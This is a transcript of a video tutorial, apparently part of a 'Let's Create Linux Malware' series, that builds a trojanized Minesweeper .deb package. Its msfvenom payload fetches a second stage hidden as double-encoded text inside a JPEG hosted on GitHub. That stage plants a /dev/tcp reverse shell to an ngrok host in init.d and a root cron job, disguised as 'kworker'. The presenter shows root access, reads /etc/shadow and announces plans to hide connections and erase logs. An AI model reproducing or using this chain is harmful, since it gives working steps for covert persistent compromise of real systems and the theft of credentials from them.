And greetings everyone, and welcome back to my cybersecurity show. And today I'm going to start off with a little disclaimer, right? A little something to remind us all that the things we are learning today are for educational purposes only, right? You do this stuff on things that you don't own or you don't have permission to, you're going to get in trouble. And I hope you do, because you're not supposed to do that, right? This is all about learning. This is all about using this to figure out new and exciting things about how IT works and technology and security, right? That's what we're trying to do. We're not trying to use this for any nefarious purposes. So if I catch you doing it, big bag of knuckles, right? There you go. There's your warning. Don't do that stuff. Only on systems that you own or have express permissions to. That said, welcome back. Today is the next installment of our Let's Create Linux Malware series that we've got going on. And if you remember in the last episode, we had some pretty good times, and we used Microsoft. We didn't use Microsoft. We used Metasploits to create a Trojan. We had a nice little game, text-based Minesweeper game, in which we just kind of planted a seed of, a Metasploit payload into, and it gave us shell. And I thought that was really cool, but it was a bit of a one-trick pony, right? It was one thing, it did that, and it did it well, it did fine. We were happy with it. But there's no persistence in that. You had to be ready and willing to catch that. And with something like a Trojan, there are circumstances where you probably would not be sitting around just waiting for it to come back. And even if you did, that's great. And, it's just, it wasn't spicy enough, right? It didn't have that spice that I was looking for, where I just want to be able to set my Trojan out to the world, and whenever I feel like logging into them, that's what I do. So that's what I wanted to do. I wanted to make it a little more user-friendly for this side of the fence, so that when all I had to do was log into my computer, open the connection, and there you go. Now, that said, a couple little caveats here. We're going to be using some things for demonstration purposes that would basically kind of negate that a little bit. But in real life land, I would be setting up a little more infrastructure. I could use the things that I'm using today. If I'm remembering correctly, we'll cross that bridge when we get there. I could use those things for this in a more permanent connection. I'm just not right now, okay? But I could. Okay, that said, what are we going to do today? Well, what we're going to do today is we're going to take that payload, that Metasploit payload, instead of doing a reverse shell, we're going to have the system execute a command, actually a string of commands. And those string of commands are going to set us up for that persistence. Also going to kind of give us a little bit of stealth. We're going to use some interesting things. We're going to play around with Ngrok today, right? Ngrok is something that people have asked me about since I did a video, which is there, right? No, this side. It's this side. It's always this side. I don't want to be left-handed, but I am today. So there you go. It's on this side where I did port forwarding. How would you port forward a payload, like a reverse shell, from the internet back into your home network? And that was doable. We did that. It was a lot of fun, but a lot of people were like, hey, can't you use Ngrok with this? I'm like, yeah, you can do that with Ngrok. I just kind of wanted to show you that basic networking thing. But today we'll use Ngrok to do that. We'll catch that, and it will be very simple and kind of kill two birds with one stone kind of thing. All right. So that's what we're going to do. There is a lot of moving pieces to making this happen. And I'm not going to lie, this was not easy and took me quite a few hours of ironing out the kinks to making it work smoothly. And I'll be honest with you, I'm not 100% sure it's going to work smoothly today. Hey, that's the fun of the internet, right? If it breaks, we will try to figure out how to fix it. If I got to take a break, we'll take a break. And we'll fix it and we'll get it back. I'll show you what I did. I'm hoping everything goes well. I think I've got it down pretty well on how to make this work flawlessly. Right? Fingers crossed. We are doing this in front of a camera. And I don't know if you guys noticed, if you've ever done a demo in front of a camera before, demos like to go pow-pow when you turn the camera on. So we'll see if it gets red light fever or not. Hopefully not. But without further ado, what say ye? Shall we? Let us. All right, let's get into the computer. All right, first things first. Actually, I'm going to go here. Let me get the right thing up first. Let me go to the computer screen. I want to put things ahead of cart, horse, right spots, right? So first thing I'm going to do is we are going to start Ngrok. Now, Ngrok is super simple to get downloaded, you must sign up for a free account for all this to work, but the free account will give you everything we need to do today. Okay? And for me to do this, I just sudo ngrok on, if I want, I just say TCP. So that's the protocol I want to use. And then the port I want to do it with. And I will do 443. I like 443, as we have, I think, talked about before in the past, because 443 is rarely stopped by, egress filtering or any kind of filtering whatsoever. Bada bing, put the old password in. There we go. It is now ngrokking up. And what we need to see here is, let me just, I'll kind of resize some stuff here so we can see. But what's important for us is this right here. That's what we need. So basically we're going to take this name, this 2.tcp.ngrok.io. That's what we need. And then the port that's associated with that. And that is going to be our outside connector, right? So Ngrok is going to use that dynamic DNS name and port number to forward traffic that goes to it. So anything that contacts 2.tcp.ngrok.io on port 19450 will actually get forwarded, tunneled into my local network, onto my local machine, and it will make a connection with a local port that I have open here on this system. So that's why this is important, and you can see that's right here. This is localhost on port 443. So that is where things are being set up. Now, I need to do that because, like I said, I'm just kind of setting this stuff to be easily broken down later. And I am going to get this to where I can, that's good enough, play with this here. But if I wanted to, I can make this a more permanent thing. Ngrok has those options. I'm not sure if it's under the pay for. I'm pretty sure it is, though. But that might be worth it. I could do this. I could also set up just some sort of client behind a CDN using something like AWS or Linode or whatever. That could be just another way to do it. I got all my tools here. Ngrok is making it easy for testing purposes. So that's what I'm doing. All right. Now, I have a whole list of things to remind me what to do because, like I said, multiple moving parts. Now we need to add a second stage payload to a picture file. This is where I got fancy, and probably what part of the reason that took me so long to get this to work. So what ended up happening was what I thought was, what would be cool is if instead of making the payload do all the bad things first, what if I actually reached out to a second stage, right? And I staged this, and it said, here's the bad stuff, and then it brought it in, and then it ran that instead of doing it right out of Jump Street. What if that was the way to go? I thought, can I do that? Well, I will go ahead and let you know. That ended up not being an easy task. There was first a couple of things I couldn't figure out, and then I got it figured out. And then I was like, well, we want to get fancy. It's all about hiding things. How can I stealthily do this? So let me try to set this up for you. What I wanted to do was my MSFVenom payload that I create and I put in as my Trojan bit to the Minesweeper game, Free Sweep, right? What it's going to do is it's actually going to reach out to GitHub and grab a photo that is in a GitHub repository. It is then going to run the tail command on that photo and grab the last line, which is an encoded string. That encoded string will then need to be decoded, which reveals another encoded string. That encoded string will then again need to be decoded and then run, right? So actually, I think I'm going to write that. Yes. Then I'm going to take that. I say we jump back in and take a look at what the heck I'm talking about, right? Because that can get a little confusing. So let's see here. I do believe, yes, this is where we're going to go. Kind of pregame this so you don't have to watch me type all this stuff out. And we're going to need to change some of this. Actually, no, I think this is all good. I think we can still actually use this. So what we're going to do is same kind of thing before, just like we did, MSFVenom, x64, platform Linux. This is where things get a little different. I'm going to take a sip of water here. My My throat is it's a little dry today. It's a little dry. Got to keep the pipes lubricated when you do all this talking. But here we go. It's this is where we start to change things. Let me increase that font size. I like how it did that. There we go. So Linux x64 exec. So we're not running shell reverse TCP. We're doing x64 exec, and then we're going to run a command. And that command is going to equal curl. So we're going to run curl, very common tool. So I'm leaning on it heavily. That is in Linux systems. I can't tell you the last time, or if any time, that I messed with a Linux system that did not have curl installed. So I'm going to run curl. It's going to grab this, right? https raw.github content or githubusercontent.com/Daniel Lowry, because obviously I own that GitHub. If I were actually setting this up as like a pen test or a red team engagement, I would create a new GitHub repo with a new user and all that I would then blow away later or use later for other things, but it wouldn't be my personal one. But I already got this one set up. Again, we're just testing, so I'm not really worried about this. So Daniel Lowry /funny-pics/main/bm.jpg. So that is my photo. I actually have that photo right here, as you can see. Bam. bm.back. All right, go back here. Now, what else do we have here? So now the other thing is I want to take that output and I'm going to pipe that into tail-n1. There it is, base64-d. So there's a base64 encoded string, should be the last bit of that. I'm going to show you how to do that here in just a second. And then you have to decode it again with base32. A little less well-known encoding scheme and less used, honestly. I heard about it randomly at some conference. I think it was in a CTF or something, where they were base 32 encoding. So I was like, base 32? What's this? I didn't know there was a base 32. I only knew base 64. But hey, I thought, let's use it here because most people don't know it. And it looks very similar to base 64, but not identical. And if you try to base 64 decode it, you get error, input wrong, that kind of stuff. It just complains. But once I have that string decoded, I want to then, as you can see, redirect that output to /var/temp, and I'm creating a file called kworker. We'll get to why kworker here in just a little bit, but var/temp is a great place to put things that is writable by everyone, right? So if I got in as a lower user, not as a root user, I could still access that information and it would be there. Whereas the /temp directory it's a little jinky to work with. So I like var/temp to work with. So I'm going to make this file called kworker and then semicolon, which means string to the next thing I want you to do. I'm going to run what is ever in there. Now I'm running bash. You'll notice I didn't have a shebang or anything. This is all basically creating a bash script with one line inside of it that doesn't have a shebang and it's not executable. You'll notice there's no chmod here. We're not changing permissions. But, we can still run it anyway. You just run the bash command and give it to it. And it's like, okay, I'll run that. So there you go. So I want to run that. When it runs, it will do whatever kworker does. And we'll see what that does in just momentarily. After that's done, we're going to remove var/temp kworker. So that thing is gone. If I really wanted to get crazy, I would probably use something like, shred? Yeah, but I can't guarantee shred would be there. So right now I'm just leaning on RM. Again, a friend of mine always like to say, done is better than perfect, right? Just get the thing to work, and then you can come back later, refactor, retool, tweak, make it nice, right? Make it more efficient, more effective, so on and so forth. But right now, we just want to get it to work. After that, though, should be standard things, just like we saw before. -b, elf kworker, bing, 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 right? So from here, I can create that. I'm going to Control-C this, just as it did something weird. Let's fire that off. I think everything should be right. Bing. That should create the free sweep scores package, which it looks like it did. Then, of course, I just have to do the dpkg-deb build in temp evil work, which it did. Come down here, do an ls. I have work, which I can now just move to work.deb to freesweep.deb. So that's good. Step 1 is done. Actually, I think steps 1 and 2 are done at this point. So we started Ngrok, and then we've just, basically this is our second stage of our initial payload, right? Or it's going to reach out. This is the first stage of our payload. It's going to reach out for that second stage. Now, what do we need to do? We need to get that second stage into the picture file. Okay, so let's do that. Over here, as you remember, I have our picture. Let's take a look at what that looks like. I'll open a, do I have EOD installed? EOD. Let's see if it does it. It doesn't look like it. So I'll just open the, or is it EOG? I thought it was EO something. Anything? No. EO. Yeah, must not have it installed. There's a command line tool for opening files I don't have installed. I want to open the folder. Please, thank you. Yes, we are going into linuxmalware. And then there's our picture, which is, it's from Brewster's Millions. It's one of my favorite pictures. I just think it's hysterical. If you've never seen Brewster's Millions, you now have your homework. Go look at that. Watch that movie. It is very stinking funny about a guy who inherits millions of dollars, but only if he can spend millions of dollars and not show a profit. Anyway, I won't give it away. It's funny. Go watch it. Classic 80s film. And he's running for mayor, and his slogan is, I'll make things worse, or I'll only make things worse. And that's a promise. Super funny. So this is going to be our picture. And let me close this. If we go into GitHub, here's my GitHub repo. And you can see I have just pictures, right? Boom, here's one. I see cyber risks everywhere. And I'm not sure if phishing scam or if IT department started sending email from Zimbabwe. I'm sure that's what's happening. And then, of course, bm.jpg, which is this picture right here. Now, I've already been playing around with this. This actually contains a payload. It's not the right payload, though. We need to change this. So I am going to delete this file. So hit this, delete. Yep, we're going to take that out, commit those changes. I need the right one, and that's not the right one. We got to re-upload. So let's go back here. Let's do what we need to do to make that happen. Now, to make this happen, we need to look at payload, because I've got this payload.txt. Again, you don't want to watch me type, so I'll cat payload.txt. Here's where the evilness happens. This is stage 2 of a little attack here. So what I'm doing is I'm echoing bin bash, right, to devtcp.2.ngrok. You'll see this is where I was playing with this before. So I'm going to need to change that ngrok action. Actually, I think most of it's right. 2.ngrok. I just need to change the port 19450. All right. So I'm going to need to change that from 16966 to 15450, I believe it was. And this little string of text right here, guess what that does? That creates a reverse shell. It will actually try to shell back to a listener. But I'm going to echo that into this file right here, which is etc init.d/kworker. And you're like, there's that kworker thing again. Why is that kworker there? Again, we'll get to that. But what's happening is you'll notice that's going to init.d. Guess what init.d does? Those are the initialization, yes, scripts that run when you start your computer. Yay, we like that. That's good stuff. So anything you put in there with the proper permissions and everything that it needs, when you restart the computer, it should run that. So if we reboot this computer, our target that is, a shell should try to run. I like it. Makes me happy. And then I am doing a chmod, because I am changing that. I actually could leave that chmod, but I like having the ability of any user being able to execute it. So I'm gonna run that. I'm gonna put that in there. You know, I did a chmod of ugo plus x. So I'm adding execute to the user group and other people inside of that Linux operating system. And then there's the file, which is etc init.d kworker. So I'm adding that to that. I'm adding execution to that file in that full path. Like I said, lots of moving parts. And then we are doing one more thing is we are echoing again this string right here, which is a bunch of asterisks. And if you've worked in Linux operating systems and you want to schedule a task, well, cron is going to be normally your tool of choice to do that. This is a cron formatted string. So what happens is you have the cron tab or cron table. Every user has one. You also have the etc cron tab, which is kind of like the overarching cron table for everybody, for the system. So I'm echoing into that, and you can see that goes here, etc cron tab. So /etc /cron tab is where I am. You'll notice I'm using double redirectors. That means append to. If you only use one, it'll overwrite the file. Probably not what you want to do. I typically tend to use that, so you notice it's there as well. I'm just always appending because I don't necessarily want to overwrite the file. I just want to append to the file. A lot of things can survive bad characters in them or bad strings and things of that nature. So I'd rather have that than a full-on, I just overwrote the file and all the things I actually needed are gone. So that's what I'm doing there. Also, another little tip on this, you'll notice I'm using single quotes around this and not double quotes. Anybody that's familiar with Linux operating systems, every now and then you run into, how do I encapsulate this correctly? And let me just talk about that for a hot second here. This is called expansion. When you have stuff that's wrapped up with single quotes or double quotes or maybe curly braces, and you'll see like maybe dollar signs are occurring, or maybe you see single, double, right? There's, oh my goodness. But not today, Lowry, don't do it. It's expansion, I know, but don't. It'll make you try to find a beam that'll hold your weight in a long length of rope. It's very frustrating. It can be, to do it right. People that have it down pat, I'm not that kind of person. I just don't have that level of skill with Linux yet. I'm learning more about it though. Doing expansion correctly can be super difficult. So these single quotes are going to interpret this as a string, no special characters. This is just string. So that's why I'm using it here. Sometimes I'll need double quotes. Sometimes I'll need, it can get tricky. And that was another reason I actually tried to make this file list to begin with. But that proved to be very tricky because of the expansions that I was trying to do. Single quotes and double quotes. And doing it correctly. I want to continue to work with this because we're writing a few files here. We're going to do some things to in subsequent episodes, right? We got a couple more, maybe one or two more to go. After we do this one, that's going to be about, making this better, more stealthy, and keep our tracks covered as well as we possibly can, or at least as well as I can do it, that I can think of how to do. But I wanted to run all this file list and it was just kicking my butt. So I haven't given up on it. I won't give up on it. And hopefully if I can make that happen, I'll figure it out. And then we'll revisit this. But now that we have this payload, let's get back to it. Now that this payload is in our wheelhouse, we know what we're doing. We know why we're doing it. We're setting up that cron tab, that repeating task where it is firing off our kworker script, which is a reverse shell to our local host, our listener. And these stars, I didn't tell you that. These stars just mean run this every minute of every day of every week of every month of every year. I think that's how it goes. You can always look at, you can cat/etc/cron tab, and it tells you, minute, hour, day of month, day of week. That's it. There you go. So if you put stars on all that, it basically means run every minute, every hour, every day, every month, and every day of the week. That's what that means. And then what do you want to run? Well, there's the username, right? I want it to run as root, and then the command to be executed. These are just typical things that you see. Ours should show up right below this little hashtag of the target machine. Whew. Like I said, lots of moving parts. Don't say I don't bring you some if this stuff was easy, everybody'd be doing it and showing it to you, I guess. There There's good stuff. So, yeah, it's not easy. It was a big fat pile of frustration, but I persevere. I never give up. Never surrender. Sometimes you got to take breaks, though, right? Okay, back to this action here. Let's see here. What am I on? So, oh, that's what we're doing. I'm losing my mind. Let's see here. Clear this and go back to this. So I need to take this payload and I need to encode it. So how do I do that? That's a great question. And what I want to do is I want to encode that payload using base 32. I'll start there. So I can just cat payload, right? And then pipe that into base 32. Bing. There's your string. That's a base 32 string. The problem with this is, though, is this isn't one big long string. I'll show you what I mean. Let's rerun that, and we'll just kind of run that into, we'll say test.text. Well, cat test.text or nano test.text. You'll notice there are new line characters, right? It breaks this up. If in nano, the string will just continue on forever without word wrapping. It'll just kind of like let you know. So I'll show you what I mean. Let's just add some text here. I'll just whatever. Watch it as it goes off the screen. You see, it's not jumping down to the next line. And if I go up, you can see how it runs off the page. So that tells me there are new line characters. I just want one long string of text. It took a second to figure out how to get those new lines to go away. That was fun, right? So we're going to need a little... You learn a lot about Linux doing stuff like this. I will tell you what. All right, so I'm going to Control X out of here. No, I don't want to save that. Test rm test.text. I don't need you. So how do I do that? That's a great question. So I'm going to use the tr command. So man tr, just to show you what that is. Translate or delete characters. Yay, that's what I was looking for. And we're going to easily be able to just chop off a new line character. And actually, I think we're going to like replace it. Yeah, translate it. So we're going to translate that new line character into another character, which is, we'll make it a space. I think that's what I ended up having to do. I ended up having to make it a space, right? So maybe I could have done delete characters and set one do not translate. That might work. That might have worked. Anyway, I'm not going to get fancy. I didn't read the man page before this. Honestly, I probably could have just done that. I'm interested. So let's cat, where is that? Cat payload. I don't want to go into test.text. And then I'll pipe that into tr-d, give it a /n. So a \n is the new line character. You can type that in and it will understand that that means a new line, but typically we do not. It's like a white space character. You don't see it. It doesn't show up. It's not represented as anything other than white space. Clear space, nothing there, right? Let's see what that does. That does work. That was a whole lot easier. I'm foolish. I got fancy and went with sed. And so now you can do test.text. And we will nano test.text. See how now it's running off the line? Man, I'm a fool. I'm learning just like you. I have definitely not reached the mountaintop of this. So let me rm test.text. And now, because I was using sed to chop off, because I was translating instead of deleting. But now we've got that. Hey, ho ho, say so. Sounds good. All right, but now that we have that, I actually am going to save that to a file. So let's save that into, we'll call it b32 underscore payload.txt. Bam. Now I want to re-encode that string into a base 64, right? So I'm going to cat b32, and then I'm going to pipe that into base 64, and then I'm going to pipe that into I don't even think I need tr. Probably, though. Let's see what it does. Yeah, it's still making the new line characters. Stinking new line characters get you everywhere. tr-d, bam, / in single quote. Fire that off. That looks right. And now we can just save that to b64 underscore payload .txt. Just making sure everything looks good. And now I have a cat b64 payload.txt. Booyah. We are killing it, everybody. So now what I need to do is, well, actually, I forgot to make that port change. This would not have worked. We're going to have to redo all this process. So no big deal. rmb32 underscore, or I can just overwrite it. Yeah, that's fine. Let's go into payload. So nano payload and change that port number because it would have got us good. We'd be like, why ain't this working? It's little things like that that you go, why ain't that work? And then you spend 20 minutes going, oh, I forgot to change the port number because I'm a moron. You just don't call me Billy. Hey, Billy, you moron. What the heck you doing? You better get that thing right, boy. What's our port number? 19450. 19450. 19450. 19450. There we go. Control S, then Control X. Now we will redo our process. So cat payload. Actually, I have this all saved. Nope. Payload base 32. Okay, I don't know why it's doing that. That's what I'm looking for. But I don't want to append. I'll just overwrite the file. Bam. And now we'll do rerun our base 32 to base 64. That looks right. Just make sure to overwrite it and not append. Bam. Now if we cat b64 payload, yay. That should be the right payload. Okay. We got our right payload. Now I need to jam that into our picture file, right? So we got this BM. I call it back because I like to keep pristine copies of stuff. So I'm just going to copy bm.back to bm.jpg. BM standing for Brewster's Millions. And now I should have that, which I do. Now, to get this right, to make sure that our encoded string, our encoded cubed string will be the last line in that picture file, we're going to need to give it a space. So I'm going to echo nothing into, and remember, append, we're not overwriting, into bm.jpg. Bam. Now we'll cats b64 underscore payload into bm.jpg. APG. Bam. And we can make sure that that is there by tail-n1. I'm just asking for the last line of bm.jpg. And look at that. We can even go one step further by base 64, decoding it by base 64, and then base 32-d. And look at that. There's our payload in all its glory, and it is inside of a JPEG. Now, what do we got to do next? Well, we got to upload this monkey into, what is this? GitHub. Yes. My brain blanked out on me for a second there. All right, let's get this in here. So we add a file, upload the file. This is fun. All right, choose my file. I will go home looking for Linux malware, and there is, I want to make sure that that actually looks right. Let's open, like I said, things can go awry pretty quickly. Let's open that folder. Just want to make sure that that looks good. bm.jpg. You'll notice it is opening as a normal file, right? It looks like a picture. Because it is a picture. It's just housing some horribleness. Okay, just making sure everything looks good. I will choose my file because it wasn't like giving me the thumbnail of it wasn't coming out right. Let's go. Where's that? Linux malware. There it is. Booyah. And open. Then commit the change. That should be done. And now we have this. Haha. Excelente. Now, we are going to need one other thing from this. And that is, if you hit the download button, it takes you here. this URL, we are going to need that URL. So I don't know if you can see that, but it doesn't really matter. It's the URL at the top of the page for this picture, right? That is what we are going to need, because that is what we are going to add, or that's what we did add to, if we go back to here, you'll remember, hello, we put that here when we curled. Raw GitHub user content, boom, bm.jpg right there. And that is that URL. That's where I got that from. And the cool thing about that is I can change the payload, re-upload the picture, right? Right? And you can make it anything you want. I could even add other stuff, so I could have it reaching out to different pictures with different payloads doing other things. So this is kind of like my mindset where I was on this stuff. Okay. Whew. Man, this is getting crazy. So we have this. Let's see here. Where are we? We are ready to upload this, right? So now all we have to do is take the little Trojan package that we've wrapped up as a Christmas gift to our users out there. You know, not for real, right? We're not doing bad things. This is all for learning purposes. We get that uploaded, and as soon as somebody fires that off, it should give us shell access to the thing, and that will be fun. Now, first thing we need to do is upload. This is where we're actually going to use Ngrok. So when we look at Ngrok again, this is going to be fun because we'll need this. So let's see here. Actually, I need to go here and here, because this is where freesweep.deb exists. And if I sudo, well, I'll wait for it. let me get logged in and go here. And I am going to ssh-i, give it my key.pem as Ubuntu at, and then I wrote it down 3.86.204.80. That's the IP address of my target. And this target is just an AWS instance that I have up and running. I just realized you guys can't see that. There we go. So just going to SSH into that, and then we can serve up the file. So how do we this is what we're doing. How do we transfer? Just like we did before, we're just going to SSH in, wget the file, and put on our, hit the I believe button on that. Somehow, I attached it to an email and the user said, oh, this looks fun, I'm going to install. Just like every other Trojan malware, or I say every other, a lot of other Trojans and malware gets installed is because a user installed something from an untrusted source, right? Or they got an email with an attachment, even from a trusted source, that was infected, and they are now infected, right? So I'm going to get logged in. I think I'm going to get logged in. Let's try that. There we go. Yes. And we are logged in. And don't worry about knowing that IP address, because as soon as I'm done filming this, I'm blowing that thing away. So no big deal. So I'm going to do a wget. This is where Ngrok comes in handy, right? So let's go back. Let's fire up. I'll use just Python. Oh, I need to sudo this. Sudo Python 3-m http.server on port 443. Because remember, I'm forwarding on port 443 using Ngrok. So now when I come back here, I do a wget of http : bang bang, and I run over here to Ngrok and I just copy that, paste it in here, and then / freesweep.deb, and we see we got it. File is downloaded. Zang. That was easy. Thank you, Ngrok, for the free service. It is a delight and is very helpful. All right, let's go back to here. Now we can just Control-C that. Whew. Like I said, lots of moving parts. Now that we've got that uploaded, we need to set up the listener. We need to get that listener ready so that we can actually, get that show. That's what we want, right? So should I do it? Let's do it like this. Just trying to figure out where I want that shell at. How about we split this? Split it. Booyah. And from here, I will sudo nc-nvlp on port 443, put in the password. And if everything goes according to plan, we should have ourselves some shell action here. So let's fire it off. Sudo dpkg /i freesweep.deb. It is definitely doing some stuff. I don't know if it's going to work though, but hey, it's always a fun. Looks like something's gone crazy. Let's do... I've noticed when I've done this, like the free sweep utility kind of goes a little nuts. It does work. You can run it, but I'm going to look for... and I'm going to kill it. There we go. 9.5. Uh-oh. Oh, that's random stuff on the internet making connections. I noticed that happens from time to time, so just be prepared for that. Let's kill that. So kill 9540. You can't see it typing in because my terminal has gone janky as all get out. I'm just going to exit out, and then we'll reconnect just to make sure everything's running. And we can actually verify that this stuff has happened. If we cat/etsy/cron tab, we'll notice it did actually work. There. Oh, my mouse has gone nuts. Oh, but look. Haha. ID. Haha. We are root. It does work. Everything is working. Yes. Yes. It does the things we like it to do, does it not? I love this. So here, I'll just kind of clean this up with Python. C here, import pty, and then pty.spawn, bin bash, get a nicer looking shell. There we go. Root at IP, bam. I am hostname. I guess that is the hostname, is that IP address. But you'll notice it worked like fun. I don't need you anymore. Let's get the heck out of here. This thing's gone nuts. exit. But here is our shell. We can do things like cat etsy/shadow because we are roots. Oh, look at this. We have possible, well, not possible. We have password hashes, which possibly we could break and use that for pivoting. Is this connected to other stuff? And watch this. This will be fun. I'm going to exit out, right? Exit out. We have stopped our listener, right? Host name now is Hackbox2, as it should be. But if I refire up sudo nc-nvlp anytime I want, and I just wait, and it should take anywhere between a minute or less, and we'll see it'll say connected from to so on and so forth. So let's just give that a few seconds here. We can always run like a date command to see how long before it's going to go. Oh, I guess you'd have to do it on that machine. Oh, there it is. You exit out of there. See, now I have persistence. This thing is beaconing back to our machine. This is money. I love this. I do ID. I'm logged in as roots. So I get root privs every time I do this. And now, that K-worker thing. I remember I told you I was looking at time. I know we're running a little long. There was a lot of moving pieces to this, though. I got one more thing to tell you why this is going here. Actually, I'm logged in. So why did I use that K-worker thing? Let's clean this up with Python again. C port pty.spawn / oops bash bam. Because if I do a ps aux, and let's just fire that off. This was me trying to get hidden, trying to hide things, right? So I see this K-worker all over the joint, right? There was the one there. There's probably more up here. KM path. Yeah, there's another K-worker. This, that, the other. So again, I am trying to have a bit of stealth and fly under the radar. So I'm using something that I'm using a name for my malicious file that probably wouldn't raise any suspicion. because kworker is something normal to see as like something that runs. Now, in etc/init.d, and you'll see there's our kworker file right there. It's there, and if someone were getting enterprising, they could cat/etc/init.d/kworker, and they would see it's doing all this. I don't like that, so I'm going to try to figure out a way to obfuscate that. I think I have some good ideas. Also, if we did something like ss/tcp, right? Did they not have that in here? As expected, inet prefix. Okay. ss-help. What am I doing wrong here? I thought it was just TCP and you're done. Oh, is it like -t? I think that's what it is. Yeah, ss-t. I would see this connection, which I don't want to show. Or if it's like netstats-antup, I would see that right there. I don't like that. I don't want nobody to see that. So I'm going to try to think of some ways to get around that. But there we go, man. It is done. So we are getting it good. Whew, man, I'm not going to lie. That was a struggle. That was a fight. I'm so glad everything actually worked. But how cool is that we hid a second stage payload in a picture file that's hosted by GitHub. So all HTTP traffic that's coming from, so if you were looking at these logs and trying to see, oh yeah, there's 443 out to GitHub, and it's just somebody looking at picture files on a GitHub repo. If this was on a, this is on a server, so obviously it doesn't have a lot of traffic, but in a desktop environment, people go to GitHub and stuff like that all the time. There would be so much web traffic to sift through to find that. And then when they did, they'll see the information for the picture. They might even see, if they're looking, they'll see that base 64 encoded string. But when they decode it, it'll be base 32, and they might try to base 64 decode it, and it'll say invalid input. And they'll go, oh, that's weird. And maybe that's all there is to it. They just think, oh, it's just random stuff that's a part of that GIF, that JPEG. That was my idea anyway. So what did we learn today? We learned how to use Ngrok. We learned we learned a little bit about Linux expansion, which is not fun. We learned a bit about encoding and decoding and how we can use some cool tools like TR to help manipulate information in the way we need it to be so that it does what we want it to do when we want it to do it. What else did we learn today? And a little bit of stealth, right? I want to get into more stealthy stuff. Like I said, I don't want people to be able to see that kworker. I want to start, right? There's going to be logs. I want to, right, remove any logs. Again, covering tracks is a big deal when it comes to persistence. I really want to kind of move us into the idea of being, dare I say, APT, right? APT-ish, APT light. I like that. APT light, right? We're not truly advanced persistent threats, but we're getting there, right? Half the calories anyway of real APT. That's what I want to do. I think it's been a lot of fun. I have learned a ton doing this so far. I expect to learn more getting down that road. So I look forward to seeing everybody out there then. If I've made any mistakes or misspoke, which I most likely have, feel free to let me know about that and fix that for me, and we'll make sure that's going in the comments. That said, I forgot to tell everybody, don't forget to like, subscribe, comments, share with your friends. That's going to help promote the channel. And the more you guys promote, the more I'm going to be able to do cool stuff and help everybody, even including myself, learn more about how to be an effective security specialist. All right, everyone, thanks for watching. I hope to see you next time. Until then, keep hacking.